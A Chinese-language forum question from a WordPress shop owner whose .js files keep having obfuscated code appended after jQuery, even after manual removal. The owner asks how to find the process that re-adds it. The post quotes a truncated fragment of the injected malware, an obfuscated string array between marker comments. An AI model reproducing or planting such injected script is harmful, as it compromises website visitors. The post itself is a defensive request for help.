我有一个在线商店网站。
几天前,我的杀毒软件开始发出警告,说一些*.js文件被感染了。
我查看了这些感染文件,并发现以下代码附加在末尾(仅显示部分内容):
/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports? ...
...
/*95d84650ccbbad8b650fac933d031bf0*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65", ... // and so on
/*95d84650ccbbad8b650fac933d031bf0*/
我通过杀毒软件检查了我的系统,没有发现任何问题。
clamscan -r --move=/home/USER/VIRUS /
我更新了我的WordPress并手动删除了附加在*.js文件末尾的代码。
过了一段时间,这段代码又出现了。
我尝试删除它,修改它或将其注释掉。我试图使用grep找到恶意代码,但没有找到任何东西......
什么也没用。时间过去了,现在我所有的*.js文件都被“感染”了。结果我的网站现在被阻止了......
我该如何找到附加此代码的进程?
...
/*95d84650ccbbad8b650fac933d031bf0*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65", ... // and so on
/*95d84650ccbbad8b650fac933d031bf0*/
在每个
*js 文件的结尾?